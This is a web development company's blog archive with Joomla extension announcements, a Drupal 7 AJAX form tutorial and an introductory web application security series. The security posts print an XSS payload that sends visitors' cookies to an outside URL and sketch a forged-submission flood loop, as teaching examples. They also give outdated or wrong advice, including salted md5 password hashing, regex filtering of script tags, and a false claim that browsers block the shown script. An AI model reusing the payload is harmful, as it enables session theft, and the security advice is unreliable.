Simple Responsive Image Gallery for Joomla

Today we are releasing another free and open source Joomla extension – Simple Responsive Image Gallery.

As the name of the extension indicates, it’s a simple, lightweight and fully responsive image gallery which also supports HiDPI/retina devices. Almost zero configuration is required and it works out of the box. All you have to do is select the folder from which the module will pick the images. It automatically generates thumbnails for the images under the selected folder.

What makes it different and refreshing is that it doesn’t use the boring popup/lightbox effect for showing the image. Instead, it shows the image inline with the page with a nice and clean effect. Check the demo here – Demo.

To use the HiDPI/Retina device support, you need all images in double (@2x) size as well. The default size is 240px x 150px for thumbnails and 960px x 600px for fullscreen images; the double sizes are 480px x 300px for thumbnails and 1920px x 1200px for fullscreen images. If a fullscreen image’s filename is ABC.png, then leastjs will automatically request ABC@2X.png when it detects a HiDPI device. All you have to do is provide two files following this naming convention.

The module is currently pending review in the JED, so until it becomes available there you can download it directly from here.

This module is based on the leastjs jQuery plugin by Kamil Czujowski.

 


We are one of the TOP 25 web design and development companies in Delhi NCR

We are very proud to share the news that popular IT magazine and portal Silicon India has rated us as one of the top 25 web design and development companies in Delhi NCR region. It’s a huge achievement for us and I take this opportunity to thank our clients, partners and our design and development team for making this happen.

sopan technologies was rated as one of the top 25 companies in Delhi NCR


Frontpage Carousel for Joomla

We are proud to release yet another free and open source Joomla extension, Frontpage Carousel. It allows you to show articles from one or more categories of your Joomla site in a nice carousel view. The carousel is inspired by the YUI carousel; however, it’s written in MooTools, since YUI and MooTools don’t play well together. A demo of the extension is now available on our Joomla extensions demo site.

Here is a screenshot of the module.

[Screenshot: module]

It might take a couple of weeks before the listing on the Joomla Extension Directory goes live; however, it’s available for direct download on our site along with our other free Joomla extensions. Download here and enjoy this free extension!


JConverter 1.2 beta released

Following up on the previous post about the JConverter 3.x compatible version, we are happy to announce the release of JConverter 1.2 beta, which works with the latest version of Joomla 3.x. We have tested it with Joomla 3.1.5 and it works great :)

This release is available along with the standard 2.5 compatible release, JConverter 1.2, so when you purchase one, you get both. There is a limitation in the 3.x compatible release: it can’t import comments from WordPress into Joomla. That is because of JConverter’s dependency on the JComments extension. As soon as a 3.x compatible version of JComments is released, we’ll add support for it.

You can download JConverter here - http://extensions.joomla.org/extensions/migration-a-conversion/data-import-a-export/10237


JConverter for Joomla 3.0 coming soon!

Considering the numerous requests to make JConverter Joomla 3.x compatible, we have been working on it for the last couple of weeks. The extension works great with Joomla 3.x; we have tested it with the latest stable version of Joomla (3.1.5) as of today. However, there are a few things remaining, due to which the launch of the 3.x compatible JConverter might take another week or so.

First is the design. Since Joomla 3.x uses Twitter Bootstrap’s responsive template by default, we had to change all the templates/views of the extension, and a couple of them are yet to be fixed. Secondly, JConverter integrates with the popular comments extension JComments for importing comments from WordPress, but there is no 3.x compatible version of JComments yet, which means the import comments functionality most likely won’t be available in the 3.x compatible release. We thought of integrating it with another comments system which is compatible with 3.x; however, we simply couldn’t find a comments extension which is as popular as JComments and is open source as well. We are hoping they’ll release the 3.x compatible version soon.

If you haven’t yet decided to move to 3.x then you can go here to download JConverter for your 2.5 site – Download. Stay tuned for launch update on 3.x compatible release of JConverter.


Dog Boarding in Sweden

For the past couple of months, one of our teams has been working on an exciting project called Tasspass. Tasspass is a concatenation of two Swedish words – Tass and Pass. Tass means “paw” and Pass means “home”.

Screenshot from 2013-04-08 15:29:25

Tasspass is one of the very first dog boarding sites in Sweden. We have developed the site from scratch, including the logo and website design.

We are glad to share the news that tasspass.se is launching today. We are very proud to be associated with Tasspass and we firmly believe that it’ll do very well in days to come. We wish them luck and success.

Happy (dog) boarding!!


Web Applications Security – Forms, when not well formed

The response to part 1 of this series was overwhelming: lots of queries via Twitter and a bunch of good comments, which excited me to write more frequently, and I am taking note of that now. As promised, the solution to the question asked in part 1 follows below:

In practice there will be lots of addresses and lots of things that you can pass on as a gift, so it would certainly be a better idea to do something like this:

// let us assume that the current user sends the gift as a deliverable to himself/herself
// we will address the issue of sending the gift to her/him in upcoming days
if (isUserRegisteredWithAddress(address)) {
  performDelivery(gift, address);
}

We will continue towards better solutions throughout the series, but don’t hesitate to post yours right now.

Okay, let’s fasten our seat belts again to have a fast paced ride.

When I asked many developers which tag they think is the most important, most of them answered the <form> tag, because it carries everything that goes back and forth between a site and its users.

From a security point of view, <form> is “the one” tag which needs the most care. Let’s discuss the various security concerns with this element; later we will discuss various approaches to solving them.

1. Cross site scripting

The de facto well-known hack out there using JavaScript. Let’s see how it works. Consider a form like this:

<form action="SaveReview" method="GET">
  Your name: <input type="text" name="name">
  Your review: <input type="text" name="review">
  <input type="submit" value="Submit">
</form>

Okay, now along comes a user who enters his name, prady, and in the review field enters this:

<script>
document.location = 'http://pradeep-kumar.in/stealCookies?cookies=' + document.cookie;
</script>

You probably take a user’s review and show it somewhere on your site. You show prady’s review, and what’s this? The script runs in the browser of every user who views it, and he gets the cookies of different users. Your users are being compromised one way or another.

2. Spoofed form submission

Now, for the above form, someone can easily program bogus form submissions. That can be done by anyone, in any technology of his/her choice, with something like the following:

// initialize variables
name = 'prady';
review = 'review';
while (1) {
  // initiate a new HTTP request and repeatedly forge it
  request = 'http://yoursite.com/saveReview?name=' + name + '&review=' + review;
  name = randomize(name);
  review = randomize(review);
}

Your site will be overwhelmed with reviews in a very short period of time.

Fixing the problems

Let’s discuss a fix for the XSS attack. We can disallow the <script> tag by using regular expressions in the controller that saves new reviews. Most frameworks and CMSs do that for you, so let them take care of this issue for code reuse and better maintainability.

Now comes forged form submission. Here we can include an encrypted form number in a hidden field in the form and save the same number somewhere on the server. When the user submits the form, we can cross-check the validity of the form itself by matching the form number in the GET request against the ones stored on the server.
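The two fixes described above, sketched as an added example (not code from the original post): a single-use form token checked on submission, and encoding of reviews when they are displayed. It uses a random token where the text speaks of an encrypted form number, and encodes output rather than pattern-matching <script>; ReviewForm, the form_token field name and the session ids are assumptions made for the example.

```python
import hmac
import html
import secrets


class ReviewForm:
    """Hypothetical in-memory handler for the review form shown earlier."""

    def __init__(self):
        self.issued = {}    # session id -> outstanding form token
        self.reviews = []   # (name, review), stored exactly as submitted

    def issue_token(self, session_id):
        # The "form number": random, unguessable, remembered on the server.
        token = secrets.token_urlsafe(32)
        self.issued[session_id] = token
        return token

    def hidden_field(self, session_id):
        # Markup to place inside the <form> when it is rendered.
        return ('<input type="hidden" name="form_token" value="%s">'
                % self.issue_token(session_id))

    def save_review(self, session_id, form_token, name, review):
        # pop() makes the token single-use, so a replayed request fails.
        expected = self.issued.pop(session_id, None)
        supplied = (form_token or "").encode()
        if expected is None or not hmac.compare_digest(expected.encode(), supplied):
            return False
        self.reviews.append((name, review))
        return True

    def render_reviews(self):
        # Encode at output: stored markup is displayed as text, not executed.
        return "".join("<p><b>%s</b>: %s</p>" % (html.escape(n), html.escape(r))
                       for n, r in self.reviews)


if __name__ == "__main__":
    form = ReviewForm()
    token = form.issue_token("session-1")
    # Constructed stand-in for the script review described in the text.
    payload = "<script>/* review from the text */</script>"
    print(form.save_review("session-1", token, "prady", payload))  # accepted
    print(form.save_review("session-1", token, "prady", payload))  # replay
    print(form.render_reviews())
```
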

These are just some fixes to the problems; most of them are already taken care of. For example, most browsers don’t allow cross-domain AJAX requests, precisely because XSS exists. So, the script posted above will not work in modern browsers. Please post your solutions to the problems in the comments and stay tuned for the next post.

See you soon.


Dynamic Forms with Drupal 7 FAPI and form states

When it comes to fast-paced delivery with better-managed things, nothing beats Content Management Frameworks. Yes, there are a few outs, but the king, Drupal 7, is still far better than its counterparts, simply because of the de-normalized structure of the underlying database and the best-ever flexibility of taxonomies and relations. The last few days were really challenging for one of our teams working on Drupal 7, and I really could not resist logging our learnings here, so here we go!
Okay, let me first tell you what we were expected to do:

Dynamic loading of multiple fields of a form based on selected fields

Having implemented dependent dropdowns recently, we were aware that D7 respects AJAX a great deal.

As usual, we headed for the Examples module, where we found the following code:

$form['dropdown_first'] = array(
  '#type' => 'select',
  '#title' => 'Instrument Type',
  '#options' => $options_first,
  '#default_value' => $selected,
  // On change, call the callback and replace the element with id "wrap".
  '#ajax' => array(
    'callback' => 'ajax_example_dependent_dropdown_callback',
    'wrapper' => 'wrap',
  ),
);

$form['dropdown_second'] = array(
  '#type' => 'select',
  '#title' => $options_first[$selected],
  '#prefix' => '<div id="wrap">',
  '#suffix' => '</div>',
);

In the above code, when a value is selected in dropdown_first, dropdown_second gets its values from the server via an AJAX request, and the elements inside ‘wrap’ are replaced. We wondered what would happen if we put this wrapper around the whole form. We dug into this, and a comment on this D7 node turned out to be a real catalyst.

We tried the following and were sailing in a short period of time:

// *1 and *2 make the form dependent on the selected solution area
// *1 -- define properties for the solution area
$form['field_select_a_solution_to_revie']['und']['#ajax'] = array(
  'event' => 'autocompleteSelect',
  'wrapper' => 'wrapper-vendor-review',
  'callback' => 'solution_area_selected_ajax_callback',
  'method' => 'replace',
);

// *2 -- define properties for the form
$form['#prefix'] = '<div id="wrapper-vendor-review">';
$form['#suffix'] = '</div>';

And below is some of the code that we used in solution_area_ajax_callback()

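// Discard the submitted input and rebuild an empty form.
$form_state['input'] = array();
$form_state['rebuild'] = TRUE;
// drupal_rebuild_form() takes $form_state by reference itself; no call-time "&".
$empty_form = drupal_rebuild_form('comment_node_vendor_profile_form', $form_state, NULL);
// Keep the selected solution area ($tid is its taxonomy term id).
$empty_form['field_select_a_solution_to_revie']['und']['#value'] = taxonomy_term_load($tid)->name;
return $empty_form;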

This was only a peek at how to achieve multi-field dependency in Drupal. There are more exciting ways in which FAPI and form states prove to be really powerful; it depends on how we exploit them. As a small bonus, I am soon going to write about achieving transitive dependency between different fields in Drupal forms. Stay tuned!

Our handle on Twitter is @sopantech, see you there.


Web Applications Security – Introduction

As a matter of fact, we all make mistakes. Some of us learn from them and others just ignore them. But when it comes to the web applications that we develop, there should be no room for mistakes, because our mistakes can cause a huge loss of business and in some cases loss of life! Here mistakes refers to architectural mistakes, UX mistakes and many others. But the most prominent ones are mistakes made in security: leaving loopholes that can be used by others to harm your application. Being on the web means being open to everyone, and leaving gates open there means you are inviting everyone in.

When I started writing this blog I wanted to give an overview of web application security in a single blog post, but as you know, security is a vast subject and can’t be covered in a single post, so I decided to divide this into a blog series. So, here comes the first part.

For the upcoming posts you can subscribe to our blog. I know you are a social animal; that’s why we are on Facebook. Like us there and stay connected. For the tweeples, a bonus: @sopantech

So you, as a developer, think that you need to develop things that work. Better to think this from now on – “I develop things that work only in certain conditions”. Okay, enough said. Now imagine your web application is being hacked. What do you do next? Do you have something in backup? No... Now here comes rule 1:

Have a backup plan

Whether or not you have a backup plan, have one now. Who knows, your application may just sink when you test it against the different vulnerabilities that we are going to discuss in upcoming days.

I have three types of user in my web application: one can do this, another can do that... but one can do this also... wait a minute. Look at rule 2:

Least Privilege

Give users no more than what they actually need. If a user is meant only for data entry, what’s the use of giving him/her privileges for viewing past data? They may get all the past data and misuse it. Data is valuable.

Minimum Exposure

Yes, data is valuable, so don’t show it all. Important information like credit card numbers and passwords must be given due care. Saving passwords hashed with the md5 algorithm with a salt added gives another layer of security when people with wrong intentions compromise your database.

Trade-off between usability and security

A trade-off between space and time is well known, but when it comes to security, smart decisions have to be taken to keep usability at a good level.

Don’t correct any data

If a user is passing data, force them to provide correct data rather than correcting it yourself. For example, you don’t want to give any user access to the parent directory. So you replaced “..” with “.”, but what if someday a hacker puts in “...”?
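The “..” case above, worked through as an added example (not code from the original post): the first function corrects the input as described and is defeated by “...”, the second rejects any path that resolves outside the base directory. BASE_DIR and the function names are assumptions made for the example, and the check is lexical only (it does not resolve symlinks).

```python
import posixpath

BASE_DIR = "/srv/app/uploads"  # assumed base directory for this example


def correct_then_use(user_path):
    """The 'correcting' approach from the text: replace '..' with '.'."""
    corrected = user_path.replace("..", ".")
    return posixpath.normpath(posixpath.join(BASE_DIR, corrected))


def validate_or_reject(user_path):
    """Never rewrite the input; refuse it if it resolves outside BASE_DIR."""
    if user_path.startswith("/") or "\x00" in user_path:
        raise ValueError("absolute paths and NUL bytes are not accepted")
    resolved = posixpath.normpath(posixpath.join(BASE_DIR, user_path))
    # commonpath compares whole components, so /srv/app/uploads2 does not match.
    if posixpath.commonpath([BASE_DIR, resolved]) != BASE_DIR:
        raise ValueError("path escapes the base directory")
    return resolved


def is_accepted(user_path):
    """True when validate_or_reject() lets the path through."""
    try:
        validate_or_reject(user_path)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed inputs: a normal file, the '..' case and the '...' case.
    for path in ("photos/cat.png", "../config.ini", ".../config.ini"):
        print("%-16s corrected -> %-32s accepted by validation: %s"
              % (path, correct_then_use(path), is_accepted(path)))
```

With validation, “...” is just an unusual directory name that stays under the base directory, while the corrected version of the same input ends up one level above it.
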

It’s all about connections

Most security breaches are found where some ‘connection’ exists between two entities. These entities can be client and server, database and application, or an API and the clients accessing it. Let’s take an example. Suppose you have a form:

<form action="deliverGift" method="GET" name="myform">
<select name="gift">
<option value="watch">Watch</option>
<option value="popcorns">Popcorns</option>
<option value="sandwitch">Sandwitch</option>
</select>
<input type="hidden" name="address" size="25" value="heaven on earth" />
</form>

… and somewhere in deliverGift you wrote performDelivery(gift, address); but the story doesn’t end here. What if the user makes a spoofed HTTP GET request of the form:

 /deliverGift?gift=keyboard&address=usa

In that case your application will end up delivering a keyboard to usa, which you certainly don’t want! A cure for this problem is:

// updated code: deliver only the gifts that the form offers
if (gift == "watch") {
  performDelivery(gift, address);
}
if (gift == "popcorns") {
  performDelivery(gift, address);
}
if (gift == "sandwitch") {
  performDelivery(gift, address);
}

Or you can go with a switch-case construct.

That would work fine. But it is better to use the following code:

if (gift == "watch" || gift == "popcorns" || gift == "sandwitch") {
  performDelivery(gift, address);
}

But it’s not over: you are leaving a loophole for a wrong address!

Please try to solve it yourself and post your solution in the comments. The solution will be included in the next blog post.


© 2014 Sopan Technologies
